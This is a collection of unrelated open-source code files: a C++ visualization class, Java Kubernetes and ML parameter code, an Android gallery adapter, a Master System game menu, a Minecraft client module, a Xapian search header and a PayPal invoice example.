/********************************************************************************* * * Inviwo - Interactive Visualization Workshop * * Copyright (c) 2020-2021 Inviwo Foundation * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * *********************************************************************************/ #include <modules/basegl/datastructures/stipplingsettings.h> #include <modules/basegl/datastructures/stipplingsettings.h> namespace inviwo { StipplingSettings::StipplingSettings(const StipplingSettingsInterface* other) : mode(other->getMode()) , length(other->getLength()) , spacing(other->getSpacing()) , offset(other->getOffset()) , worldScale(other->getWorldScale()) {} StipplingSettingsInterface::Mode StipplingSettings::getMode() const { return mode; } float StipplingSettings::getLength() const { return length; } float StipplingSettings::getSpacing() const { return spacing; } float StipplingSettings::getOffset() const { return offset; } float StipplingSettings::getWorldScale() const { return worldScale; } } // namespace inviwo
643
333
<gh_stars>100-1000 /** * Copyright 2016 Red Hat, Inc. * * Red Hat licenses this file to you under the Apache License, version * 2.0 (the "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or * implied. See the License for the specific language governing * permissions and limitations under the License. */ package io.fabric8.maven.core.handler; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Objects; import io.fabric8.kubernetes.api.model.Container; import io.fabric8.kubernetes.api.model.ObjectMeta; import io.fabric8.kubernetes.api.model.ObjectMetaBuilder; import io.fabric8.kubernetes.api.model.PodSpec; import io.fabric8.kubernetes.api.model.PodTemplateSpec; import io.fabric8.maven.core.config.ResourceConfig; import io.fabric8.maven.core.util.kubernetes.KubernetesHelper; import io.fabric8.maven.docker.config.ImageConfiguration; import io.fabric8.maven.docker.util.ImageName; import io.fabric8.openshift.api.model.DeploymentConfig; import io.fabric8.openshift.api.model.DeploymentConfigBuilder; import io.fabric8.openshift.api.model.DeploymentConfigSpec; import io.fabric8.openshift.api.model.DeploymentConfigSpecBuilder; public class DeploymentConfigHandler { private final PodTemplateHandler podTemplateHandler; DeploymentConfigHandler(PodTemplateHandler podTemplateHandler) { this.podTemplateHandler = podTemplateHandler; } public DeploymentConfig getDeploymentConfig(ResourceConfig config, List<ImageConfiguration> images, Long openshiftDeployTimeoutSeconds, Boolean imageChangeTrigger, Boolean enableAutomaticTrigger, Boolean isOpenshiftBuildStrategy, List<String> generatedContainers) { DeploymentConfig deploymentConfig = new DeploymentConfigBuilder() .withMetadata(createDeploymentConfigMetaData(config)) .withSpec(createDeploymentConfigSpec(config, images, openshiftDeployTimeoutSeconds, imageChangeTrigger, enableAutomaticTrigger, isOpenshiftBuildStrategy, generatedContainers)) .build(); return deploymentConfig; } // =========================================================== private ObjectMeta createDeploymentConfigMetaData(ResourceConfig config) { return new ObjectMetaBuilder() .withName(KubernetesHelper.validateKubernetesId(config.getControllerName(), "controller name")) .build(); } private DeploymentConfigSpec createDeploymentConfigSpec(ResourceConfig config, List<ImageConfiguration> images, Long openshiftDeployTimeoutSeconds, Boolean imageChangeTrigger, Boolean enableAutomaticTrigger, Boolean isOpenshiftBuildStrategy, List<String> generatedContainers) { DeploymentConfigSpecBuilder specBuilder = new DeploymentConfigSpecBuilder(); PodTemplateSpec podTemplateSpec = podTemplateHandler.getPodTemplate(config,images); specBuilder.withReplicas(config.getReplicas()) .withTemplate(podTemplateSpec) .addNewTrigger().withType("ConfigChange").endTrigger(); if (openshiftDeployTimeoutSeconds != null && openshiftDeployTimeoutSeconds > 0) { specBuilder.withNewStrategy().withType("Rolling"). withNewRollingParams().withTimeoutSeconds(openshiftDeployTimeoutSeconds).endRollingParams().endStrategy(); } return specBuilder.build(); } private void validateContainer(Container container) { if (container.getImage() == null) { throw new IllegalArgumentException("Container " + container.getName() + " has no Docker image configured. " + "Please check your Docker image configuration (including the generators which are supposed to run)"); } } }
1,351
3,301
package com.alibaba.alink.params.feature; import com.alibaba.alink.params.dataproc.HasHandleInvalid; import com.alibaba.alink.params.mapper.ModelMapperParams; import com.alibaba.alink.params.shared.colname.HasOutputColsDefaultAsNull; import com.alibaba.alink.params.shared.colname.HasReservedColsDefaultAsNull; import com.alibaba.alink.params.shared.colname.HasSelectedCols; /** * parameters of one hot predictor. */ public interface OneHotPredictParams<T> extends ModelMapperParams <T>, HasSelectedCols <T>, HasReservedColsDefaultAsNull <T>, HasOutputColsDefaultAsNull <T>, HasHandleInvalid <T>, HasEncodeWithoutWoe <T>, HasDropLast <T> { }
231
392
<gh_stars>100-1000 package com.luminous.pick.Adapter; import android.content.Context; import android.support.v7.widget.RecyclerView; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.ImageView; import com.luminous.pick.CustomGallery; import com.luminous.pick.R; import com.nostra13.universalimageloader.core.DisplayImageOptions; import com.nostra13.universalimageloader.core.ImageLoader; import com.nostra13.universalimageloader.core.ImageLoaderConfiguration; import com.nostra13.universalimageloader.core.listener.SimpleImageLoadingListener; import java.util.ArrayList; import butterknife.BindView; import butterknife.ButterKnife; /** * Created by <NAME> (<NAME>) on 06-Jul-18. */ public class ImageListRecyclerAdapter extends RecyclerView.Adapter<ImageListRecyclerAdapter.VerticalItemHolder> { private final Context mContext; private final ImageLoader imageLoader; private final DisplayImageOptions imageOptions; public ArrayList<CustomGallery> mItems = new ArrayList<>(); private boolean isActionMultiplePick; public EventListener mEventListener; // private AdapterView.OnItemClickListener mOnItemClickListener; public ImageListRecyclerAdapter(Context mContext) { this.mContext = mContext; imageLoader = ImageLoader.getInstance(); ImageLoaderConfiguration config = new ImageLoaderConfiguration.Builder( mContext).build(); imageLoader.init(config); imageOptions = new DisplayImageOptions.Builder() .cacheInMemory(true) .showImageOnLoading(R.drawable.no_media) .showImageForEmptyUri(R.drawable.no_media) .showImageOnFail(R.drawable.no_media) .build(); } public boolean isMultiSelected() { return isActionMultiplePick; } public interface EventListener { public void onItemClickListener(int position, VerticalItemHolder v); } public ArrayList<CustomGallery> getSelected() { ArrayList<CustomGallery> dataT = new ArrayList<CustomGallery>(); for (int i = 0; i < mItems.size(); i++) { if (mItems.get(i).isSeleted) { dataT.add(mItems.get(i)); } } return dataT; } public void addAll(ArrayList<CustomGallery> files) { try { this.mItems.clear(); this.mItems.addAll(files); } catch (Exception e) { e.printStackTrace(); } notifyDataSetChanged(); } public void changeSelection(VerticalItemHolder v, int position) { if (mItems.get(position).isSeleted) { mItems.get(position).isSeleted = false; } else { mItems.get(position).isSeleted = true; } v.imgQueueMultiSelected.setSelected(mItems.get(position).isSeleted); //((ImageListRecyclerAdapter.VerticalItemHolder) v.getTag()).imgQueueMultiSelected.setSelected(mItems.get(position).isSeleted); } public void clear() { mItems.clear(); notifyDataSetChanged(); } public void setMultiplePick(boolean isMultiplePick) { this.isActionMultiplePick = isMultiplePick; } @Override public VerticalItemHolder onCreateViewHolder(ViewGroup container, int viewType) { LayoutInflater inflater = LayoutInflater.from(container.getContext()); View root = inflater.inflate(R.layout.gallery_item, container, false); return new VerticalItemHolder(root, this); } @Override public void onBindViewHolder(final VerticalItemHolder holder, final int position) { CustomGallery item = mItems.get(position); // imageLoader.displayImage(item.sdcardPath, holder.imgQueue); holder.setImage(item.sdcardPath); if (isActionMultiplePick) { holder.imgQueueMultiSelected.setVisibility(View.VISIBLE); } else { holder.imgQueueMultiSelected.setVisibility(View.GONE); } if (isActionMultiplePick) { holder.imgQueueMultiSelected .setSelected(item.isSeleted); } holder.container.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View view) { if (mEventListener != null) { mEventListener.onItemClickListener(position, holder); } } }); } @Override public int getItemCount() { return mItems.size(); } public CustomGallery getItem(int position) { return mItems.get(position); } public class VerticalItemHolder extends RecyclerView.ViewHolder { @BindView(R.id.imgQueue) ImageView imgQueue; @BindView(R.id.imgQueueMultiSelected) ImageView imgQueueMultiSelected; @BindView(R.id.container) View container; public VerticalItemHolder(View itemView, ImageListRecyclerAdapter adapter) { super(itemView); ButterKnife.bind(this, itemView); } public void setImage(String url) { imageLoader.displayImage("file://" + url, imgQueue, new SimpleImageLoadingListener() { @Override public void onLoadingStarted(String imageUri, View view) { imgQueue .setImageResource(R.drawable.no_media); super.onLoadingStarted(imageUri, view); } }); } } public void setEventListner(EventListener eventListner) { mEventListener = eventListner; } }
2,446
640
<filename>libsrc/_DEVELOPMENT/EXAMPLES/sms/MoggyMaster/src/menu.h<gh_stars>100-1000 #define LAST_CHOICE 1 unsigned char menu (void) { // Set palettes SMS_loadBGPalette (palette_2); // Load patterns for tiles. TITLE_NPATTERNS tiles, 32 bytes per tile. SMS_loadTiles (title_patterns, 0, TITLE_NPATTERNS * 32); // Directly copy nametable to VRAM, FULL 1536 bytes SMS_loadTileMap (0, 0, title_nametable, 1534); // Last tile is a black square. I won't be copying it SMS_setTileatXY (31, 23, 0x1000 + 0); // So I print a blank by hand. // Turn screen on SMS_displayOn (); // Murcia stuff PSGPlay (m_title [tv_system]); while (1) { // Move sprite cursor gpint = SMS_getKeysStatus (); // Silly, but maybe someday there's more than 1 option if ((gpint & PORT_A_KEY_UP) || (gpint & PORT_B_KEY_UP)) if (menu_choice) { menu_choice --; PSGSFXPlay (s_select [tv_system], SFX_CHANNEL2); } if ((gpint & PORT_A_KEY_DOWN) || (gpint & PORT_B_KEY_DOWN)) if (menu_choice < LAST_CHOICE) { menu_choice ++; PSGSFXPlay (s_select [tv_system], SFX_CHANNEL2); } if ((gpint & PORT_A_KEY_1) || (gpint & PORT_B_KEY_1)) { PSGSFXPlay (s_select [tv_system], SFX_CHANNEL2); break; } // Sprite to highlight menu choice SMS_initSprites (); SMS_addSprite (72, (menu_choice << 4) + 112, 0); SMS_finalizeSprites (); // Wait for VSync and update SAT SMS_waitForVBlank (); SMS_copySpritestoSAT (); // Murcia stuff PSGFrame (); PSGSFXFrame (); } PSGStop (); // Wait 1 second wait_frames (50); PSGSFXStop (); // Last tile is a black tile. effect (TITLE_NPATTERNS - 1); SMS_displayOff (); return menu_choice; } void do_vs_screen (void) { // Who won? if (friends [0] == friends [1]) { who_won = 2; } else { who_won = friends [0] < friends [1]; won [who_won] ++; } // Set palettes SMS_loadBGPalette (palette_4); // Load patterns for tiles. VS_SCR_NPATTERNS tiles, 32 bytes per tile SMS_loadTiles (vs_scr_patterns, 0, VS_SCR_NPATTERNS * 32); // Clear nametable to char 0 cls (); /*SMS_setNextTileatXY (0, 0); for (gpit = 0; gpit < VS_SCR_NPATTERNS; gpit ++) SMS_setTile (gpit); */ // Draw context dependent stuff if (who_won == 1) { print_str (14, 2, "WAW"); SMS_loadTileMapArea (12, 6, vs_scr_sect_01, 8, 12); } else if (who_won == 0) { print_str (13, 2, "MOGGY"); SMS_loadTileMapArea (12, 6, vs_scr_sect_00, 8, 12); } // Draw fixed stuff // Moggy stats print_str (1, 5, "1UP MOGGY"); SMS_setTileatXY (3, 7, VS_SCR_NPATTERNS - 3); SMS_setTile (59); print_3digits_next (friends [0]); write_big_num (3, 9, score [0]); print_str (3, 11, "TOTAL"); thick_number (2, 13, won [0] / 10, VS_SCR_NPATTERNS - 2); thick_number (6, 13, won [0] % 10, VS_SCR_NPATTERNS - 2); // Waw stats print_str (23, 5, "2UP WAW"); SMS_setTileatXY (24, 7, VS_SCR_NPATTERNS - 3); SMS_setTile (59); print_3digits_next (friends [1]); write_big_num (24, 9, score [1]); print_str (24, 11, "TOTAL"); thick_number (23, 13, won [1] / 10, VS_SCR_NPATTERNS - 2); thick_number (27, 13, won [1] % 10, VS_SCR_NPATTERNS - 2); // General if (who_won != 2) { print_str (13, 4, "WINS!!"); } else { print_str (13, 4, "DRAW!!"); } if (do_game) { print_str (11, 21, "<NAME>!"); } else { print_str (11, 21, "GAME OVER!"); } // Screen on SMS_displayOn (); // Murcia stuff PSGPlay (m_vs [tv_system]); // Wait input wait_button (); PSGStop (); PSGSFXPlay (s_start [tv_system], SFX_CHANNEL2); wait_frames (50); // Last tile is a black tile. effect (VS_SCR_NPATTERNS - 1); SMS_displayOff (); }
1,570
4,002
<filename>src/main/java/me/zeroX150/cornos/features/module/impl/misc/ClientProgression.java<gh_stars>1000+ /* @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ # Project: Cornos # File: ClientProgression # Created by constantin at 17:56, Mär 31 2021 PLEASE READ THE COPYRIGHT NOTICE IN THE PROJECT ROOT, IF EXISTENT @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ */ package me.zeroX150.cornos.features.module.impl.misc; import me.zeroX150.cornos.etc.config.MConfToggleable; import me.zeroX150.cornos.features.module.Module; import me.zeroX150.cornos.features.module.ModuleType; public class ClientProgression extends Module { public static MConfToggleable hasFinishedTut = new MConfToggleable("finishedTutorial", false); public ClientProgression() { super("clientprogression", "how much you progressed with using the client", ModuleType.HIDDEN); this.mconf.add(hasFinishedTut); } }
291
370
/** @file protomset.h * @brief ProtoMSet class */ /* Copyright (C) 2004,2007,2017,2018,2019 <NAME> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #ifndef XAPIAN_INCLUDED_PROTOMSET_H #define XAPIAN_INCLUDED_PROTOMSET_H #include "xapian/api/enquireinternal.h" #include "xapian/api/result.h" #include "xapian/matcher/collapser.h" #include "xapian/common/heap.h" #include "xapian/matcher/matchtimeout.h" #include "xapian/matcher/msetcmp.h" #include "xapian/common/omassert.h" #include "xapian/matcher/spymaster.h" #include "xapian/common/stdclamp.h" #include <algorithm> using Xapian::Internal::intrusive_ptr; class ProtoMSet { /// Adapt MSetCmp to be usable with min_heap. class MCmpAdaptor { ProtoMSet* protomset; public: explicit MCmpAdaptor(ProtoMSet* protomset_) : protomset(protomset_) {} bool operator()(Xapian::doccount a, Xapian::doccount b) const { return protomset->mcmp(protomset->results[a], protomset->results[b]); } }; friend class MCmpAdaptor; /** Maximum size the ProtoMSet needs to grow to. * * This is the maximum rank we care about. */ Xapian::doccount max_size; Xapian::doccount check_at_least; Xapian::Enquire::Internal::sort_setting sort_by; MSetCmp mcmp; /** Minimum threshold on the weight. * * If the primary result ordering is by decreasing relevance (i.e. @a * sort_by is REL or REL_VAL) then once the min_heap kicks in this * threshold is raised to the lowest weight in the proto-mset. * * Enquire::set_cutoff() can also affect min_weight - an absolute * threshold determines the initial value; a percentage threshold raises * the threshold each time max_weight increases (unless it's already * higher than the value the percentage threshold results in). */ double min_weight = 0.0; /** The highest document weight seen. * * This weight may not actually be present in @a results if we're not * sorting primarily by relevance, or if min_weight > max_weight. */ double max_weight = 0.0; bool min_weight_pending = false; /** Count of how many known matching documents have been processed so far. * * Used to implement "check_at_least". */ Xapian::doccount known_matching_docs = 0; /// The items in the proto-MSet. vector<Result> results; /** A heap of offsets into @a results. * * Created lazily once we actually need it. */ vector<Xapian::doccount> min_heap; /// First entry wanted in MSet. Xapian::doccount first; /** How many weighted leaf subqueries there are. * * Used for scaling percentages when the highest weighted document doesn't * "match all terms". */ Xapian::termcount total_subqs; /// The number of subqueries which matched to give max_weight. Xapian::termcount max_weight_subqs_matched = 0; int percent_threshold; double percent_threshold_factor; double percent_scale = 0.0; PostListTree& pltree; Collapser collapser; double max_possible; bool stop_once_full; TimeOut timeout; public: ProtoMSet(Xapian::doccount first_, Xapian::doccount max_items, Xapian::doccount check_at_least_, MSetCmp mcmp_, Xapian::Enquire::Internal::sort_setting sort_by_, Xapian::termcount total_subqs_, PostListTree& pltree_, Xapian::valueno collapse_key, Xapian::doccount collapse_max, int percent_threshold_, double percent_threshold_factor_, double max_possible_, bool stop_once_full_, double time_limit) : max_size(first_ + max_items), check_at_least(check_at_least_), sort_by(sort_by_), mcmp(mcmp_), first(first_), total_subqs(total_subqs_), percent_threshold(percent_threshold_), percent_threshold_factor(percent_threshold_factor_), pltree(pltree_), collapser(collapse_key, collapse_max, results, mcmp), max_possible(max_possible_), stop_once_full(stop_once_full_), timeout(time_limit) { results.reserve(max_size); } ProtoMSet(const ProtoMSet&) = delete; ProtoMSet& operator=(const ProtoMSet&) = delete; Collapser& get_collapser() { return collapser; } bool full() const { return results.size() == max_size; } double get_min_weight() const { return min_weight; } void update_max_weight(double weight) { if (weight <= max_weight) return; max_weight = weight; max_weight_subqs_matched = pltree.count_matching_subqs(); if (percent_threshold) { set_new_min_weight(weight * percent_threshold_factor); } } bool checked_enough() { if (known_matching_docs >= check_at_least) { return true; } if (known_matching_docs >= max_size && timeout.timed_out()) { check_at_least = max_size; return true; } return false; } /** Resolve a pending min_weight change. * * Only called when there's a percentage weight cut-off. */ bool handle_min_weight_pending(bool finalising = false) { // min_weight_pending shouldn't get set when unweighted. Assert(sort_by != Xapian::Enquire::Internal::DOCID); min_weight_pending = false; bool weight_first = (sort_by == Xapian::Enquire::Internal::REL || sort_by == Xapian::Enquire::Internal::REL_VAL); double new_min_weight = HUGE_VAL; size_t j = 0; size_t min_elt = 0; for (size_t i = 0; i != results.size(); ++i) { if (results[i].get_weight() < min_weight) { continue; } if (i != j) { results[j] = std::move(results[i]); if (collapser) { collapser.result_has_moved(i, j); } } if (weight_first && results[j].get_weight() < new_min_weight) { new_min_weight = results[j].get_weight(); min_elt = j; } ++j; } if (weight_first) { if (finalising) { if (known_matching_docs >= check_at_least) min_weight = new_min_weight; } else { if (checked_enough()) min_weight = new_min_weight; } } if (j != results.size()) { results.erase(results.begin() + j, results.end()); if (!finalising) { return false; } } if (!finalising && min_elt != 0 && !collapser) { // Install the correct element at the tip of the heap, so // that Heap::make() has less to do. NB Breaks collapsing. swap(results[0], results[min_elt]); } return true; } bool early_reject(Result& new_item, bool calculated_weight, SpyMaster& spymaster, const Xapian::Document& doc) { if (min_heap.empty()) return false; // We're sorting by value (in part at least), so compare the item // against the lowest currently in the proto-mset. If sort_by is VAL, // then new_item.get_weight() won't be set yet, but that doesn't matter // since it's not used by the sort function. Xapian::doccount worst_idx = min_heap.front(); if (mcmp(new_item, results[worst_idx])) return false; // The candidate isn't good enough to make the proto-mset, but there // are still things we may need to do with it. // If we're collapsing, we need to check if this would have been // collapsed before incrementing known_matching_docs. if (!collapser) { ++known_matching_docs; double weight = calculated_weight ? new_item.get_weight() : pltree.get_weight(); spymaster(doc, weight); update_max_weight(weight); return true; } if (checked_enough()) { // We've seen enough items so can drop this one. double weight = calculated_weight ? new_item.get_weight() : pltree.get_weight(); update_max_weight(weight); return true; } // We can't drop the item because we need to test whether it would be // collapsed. return false; } /** Process new_item. * * Conceptually this is "add new_item", but taking into account * collapsing. */ bool process(Result&& new_item, ValueStreamDocument& vsdoc) { update_max_weight(new_item.get_weight()); if (!collapser) { // No collapsing, so just add the item. add(std::move(new_item)); } else { auto res = collapser.check(new_item, vsdoc); switch (res) { case REJECT: return true; case REPLACE: // There was a previous item in the collapse tab so the // MSet can't be empty. Assert(!results.empty()); // This is one of the best collapse_max potential MSet // entries with this key which we've seen so far. The // entry with this key which it displaced is still in the // proto-MSet so replace it. replace(collapser.old_item, std::move(new_item)); return true; default: break; } auto elt = add(std::move(new_item)); if (res != EMPTY && elt != Xapian::doccount(-1)) { collapser.process(res, elt); } } if (stop_once_full) { if (full() && checked_enough()) { return false; } } return true; } // Returns the new item's index, or Xapian::doccount(-1) if not added. Xapian::doccount add(Result&& item) { ++known_matching_docs; if (item.get_weight() < min_weight) { return Xapian::doccount(-1); } if (item.get_weight() > max_weight) { update_max_weight(item.get_weight()); } if (results.size() < max_size) { // We're still filling, or just about to become full. results.push_back(std::move(item)); Assert(min_heap.empty()); return results.size() - 1; } if (min_heap.empty()) { // This breaks if we're collapsing because it moves elements around // but can be used if we aren't (and could be for elements with // no collapse key too - FIXME). if (min_weight_pending) { if (!handle_min_weight_pending()) { results.push_back(std::move(item)); return results.size() - 1; } } if (results.size() == 0) { // E.g. get_mset(0, 0, 10); return Xapian::doccount(-1); } min_heap.reserve(results.size()); for (Xapian::doccount i = 0; i != results.size(); ++i) min_heap.push_back(i); Heap::make(min_heap.begin(), min_heap.end(), MCmpAdaptor(this)); if (sort_by == Xapian::Enquire::Internal::REL || sort_by == Xapian::Enquire::Internal::REL_VAL) { if (checked_enough()) { min_weight = results[min_heap.front()].get_weight(); } } } Xapian::doccount worst_idx = min_heap.front(); if (!mcmp(item, results[worst_idx])) { // The new item is less than what we already had. return Xapian::doccount(-1); } results[worst_idx] = std::move(item); Heap::replace(min_heap.begin(), min_heap.end(), MCmpAdaptor(this)); if (sort_by == Xapian::Enquire::Internal::REL || sort_by == Xapian::Enquire::Internal::REL_VAL) { if (checked_enough()) { min_weight = results[min_heap.front()].get_weight(); } } return worst_idx; } void replace(Xapian::doccount old_item, Result&& b) { results[old_item] = std::move(b); if (min_heap.empty()) return; // We need to find the entry in min_heap corresponding to old_item. // The simplest way is just to linear-scan for it, and that's actually // fairly efficient as we're just searching for an integer in a // vector of integers. The heap structure means that the lowest ranked // entry is first and lower ranked entries will tend to be nearer the // start, so intuitively scanning forwards for an entry which we're // removing because we found a higher ranking one seems sensible, but // I've not actually profiled this. auto it = std::find(min_heap.begin(), min_heap.end(), old_item); if (rare(it == min_heap.end())) { // min_heap should contain all indices of results. Assert(false); return; } // siftdown() here is correct (because it's on a min-heap). Heap::siftdown(min_heap.begin(), min_heap.end(), it, MCmpAdaptor(this)); } void set_new_min_weight(double min_wt) { if (min_wt <= min_weight) return; min_weight = min_wt; if (results.empty()) { // This method gets called before we start matching to set the // fixed weight_threshold threshold. return; } #if 0 // FIXME: Is this possible? set_new_min_weight() from a percentage // threshold can't do this... if (min_wt > max_weight) { // The new threshold invalidates all current entries. results.resize(0); min_heap.resize(0); return; } #endif if (!min_heap.empty()) { // If sorting primarily by weight, we could pop the heap while the // tip's weight is < min_wt, but each pop needs 2*log(n) // comparisons, and then pushing replacements for each of those // items needs log(n) comparisons. // // Instead we just discard the heap - if we need to rebuild it, // that'll require 3*n comparisons. The break even is about 3 // discarded items for n=10 or about 5 for n=100, but we may never // need to rebuild the heap. min_heap.clear(); } // Note that we need to check items against min_weight at some point. min_weight_pending = true; } void finalise_percentages() { if (results.empty() || max_weight == 0.0) return; percent_scale = max_weight_subqs_matched / double(total_subqs); percent_scale /= max_weight; Assert(percent_scale > 0); if (!percent_threshold) { return; } // Truncate the results if necessary. set_new_min_weight(percent_threshold_factor / percent_scale); if (min_weight_pending) { handle_min_weight_pending(true); } } Xapian::MSet finalise(const Xapian::MatchDecider* mdecider, Xapian::doccount matches_lower_bound, Xapian::doccount matches_estimated, Xapian::doccount matches_upper_bound) { finalise_percentages(); AssertRel(matches_estimated, >=, matches_lower_bound); AssertRel(matches_estimated, <=, matches_upper_bound); Xapian::doccount uncollapsed_lower_bound = matches_lower_bound; Xapian::doccount uncollapsed_estimated = matches_estimated; Xapian::doccount uncollapsed_upper_bound = matches_upper_bound; if (!full()) { // We didn't get all the results requested, so we know that we've // got all there are, and the bounds and estimate are all equal to // that number. matches_lower_bound = results.size(); matches_estimated = matches_lower_bound; matches_upper_bound = matches_lower_bound; // And that should equal known_matching_docs, unless a percentage // threshold caused some matches to be excluded. if (!percent_threshold) { AssertEq(matches_estimated, known_matching_docs); } else { AssertRel(matches_estimated, <=, known_matching_docs); } } else if (!collapser && known_matching_docs < check_at_least) { // Similar to the above, but based on known_matching_docs. matches_lower_bound = known_matching_docs; matches_estimated = matches_lower_bound; matches_upper_bound = matches_lower_bound; } else { // We can end up scaling the estimate more than once, so collect // the scale factors and apply them in one go to avoid rounding // more than once. double estimate_scale = 1.0; double unique_rate = 1.0; if (collapser) { matches_lower_bound = collapser.get_matches_lower_bound(); Xapian::doccount docs_considered = collapser.get_docs_considered(); Xapian::doccount dups_ignored = collapser.get_dups_ignored(); if (docs_considered > 0) { // Scale the estimate by the rate at which we've been // finding unique documents. double unique = double(docs_considered - dups_ignored); unique_rate = unique / double(docs_considered); } // We can safely reduce the upper bound by the number of // duplicates we've ignored. matches_upper_bound -= dups_ignored; } if (mdecider) { if (!percent_threshold && !collapser) { if (known_matching_docs > matches_lower_bound) { // We're not collapsing or doing a percentage // threshold, so known_matching_docs is a lower bound // on the total number of matches. matches_lower_bound = known_matching_docs; } } Xapian::doccount decider_denied = mdecider->docs_denied_; Xapian::doccount decider_considered = mdecider->docs_allowed_ + mdecider->docs_denied_; // Scale the estimate by the rate at which the MatchDecider has // been accepting documents. if (decider_considered > 0) { double accept = double(decider_considered - decider_denied); double accept_rate = accept / double(decider_considered); estimate_scale *= accept_rate; } // If a document is denied by the MatchDecider, it can't be // found to be a duplicate, so it is safe to also reduce the // upper bound by the number of documents denied by the // MatchDecider. matches_upper_bound -= decider_denied; if (collapser) uncollapsed_upper_bound -= decider_denied; } if (percent_threshold) { // Scale the estimate assuming that document weights are evenly // distributed from 0 to the maximum weight seen. estimate_scale *= (1.0 - percent_threshold_factor); // This is all we can be sure of without additional work. matches_lower_bound = results.size(); if (collapser) { uncollapsed_lower_bound = matches_lower_bound; } } if (collapser && estimate_scale != 1.0) { uncollapsed_estimated = Xapian::doccount(uncollapsed_estimated * estimate_scale + 0.5); } estimate_scale *= unique_rate; if (estimate_scale != 1.0) { matches_estimated = Xapian::doccount(matches_estimated * estimate_scale + 0.5); if (matches_estimated < matches_lower_bound) matches_estimated = matches_lower_bound; } if (collapser || mdecider) { // Clamp the estimate the range given by the bounds. AssertRel(matches_lower_bound, <=, matches_upper_bound); matches_estimated = STD_CLAMP(matches_estimated, matches_lower_bound, matches_upper_bound); } else if (!percent_threshold) { AssertRel(known_matching_docs, <=, matches_upper_bound); if (known_matching_docs > matches_lower_bound) matches_lower_bound = known_matching_docs; if (known_matching_docs > matches_estimated) matches_estimated = known_matching_docs; } if (collapser && !mdecider && !percent_threshold) { AssertRel(known_matching_docs, <=, uncollapsed_upper_bound); if (known_matching_docs > uncollapsed_lower_bound) uncollapsed_lower_bound = known_matching_docs; } } if (collapser && matches_lower_bound > uncollapsed_lower_bound) { // Clamp the uncollapsed bound to be at least the collapsed one. uncollapsed_lower_bound = matches_lower_bound; } if (collapser) { // Clamp the estimate to lie within the known bounds. if (uncollapsed_estimated < uncollapsed_lower_bound) { uncollapsed_estimated = uncollapsed_lower_bound; } else if (uncollapsed_estimated > uncollapsed_upper_bound) { uncollapsed_estimated = uncollapsed_upper_bound; } } else { // When not collapsing the uncollapsed bounds are just the same. uncollapsed_lower_bound = matches_lower_bound; uncollapsed_estimated = matches_estimated; uncollapsed_upper_bound = matches_upper_bound; } // FIXME: Profile using min_heap here (when it's been created) to // handle "first" and perform the sort. if (first != 0) { if (first > results.size()) { results.clear(); } else { // We perform nth_element() on reverse iterators so that the // unwanted elements end up at the end of items, which means // that the call to erase() to remove them doesn't have to copy // any elements. auto nth = results.rbegin() + first; std::nth_element(results.rbegin(), nth, results.rend(), mcmp); // Discard the unwanted elements. results.erase(results.end() - first, results.end()); } } std::sort(results.begin(), results.end(), mcmp); collapser.finalise(min_weight, percent_threshold); // The estimates should lie between the bounds. AssertRel(matches_lower_bound, <=, matches_estimated); AssertRel(matches_estimated, <=, matches_upper_bound); AssertRel(uncollapsed_lower_bound, <=, uncollapsed_estimated); AssertRel(uncollapsed_estimated, <=, uncollapsed_upper_bound); // Collapsing should only reduce the bounds and estimate. AssertRel(matches_lower_bound, <=, uncollapsed_lower_bound); AssertRel(matches_estimated, <=, uncollapsed_estimated); AssertRel(matches_upper_bound, <=, uncollapsed_upper_bound); return Xapian::MSet(new Xapian::MSet::Internal(first, matches_upper_bound, matches_lower_bound, matches_estimated, uncollapsed_upper_bound, uncollapsed_lower_bound, uncollapsed_estimated, max_possible, max_weight, std::move(results), percent_scale * 100.0)); } }; #endif // XAPIAN_INCLUDED_PROTOMSET_H
8,104
653
from paypalrestsdk import Invoice import logging logging.basicConfig(level=logging.INFO) invoice = Invoice.find("INV2-9DRB-YTHU-2V9Q-7Q24") if invoice.send(): # return True or False print("Invoice[%s] send successfully" % (invoice.id)) else: print(invoice.error)
107
732
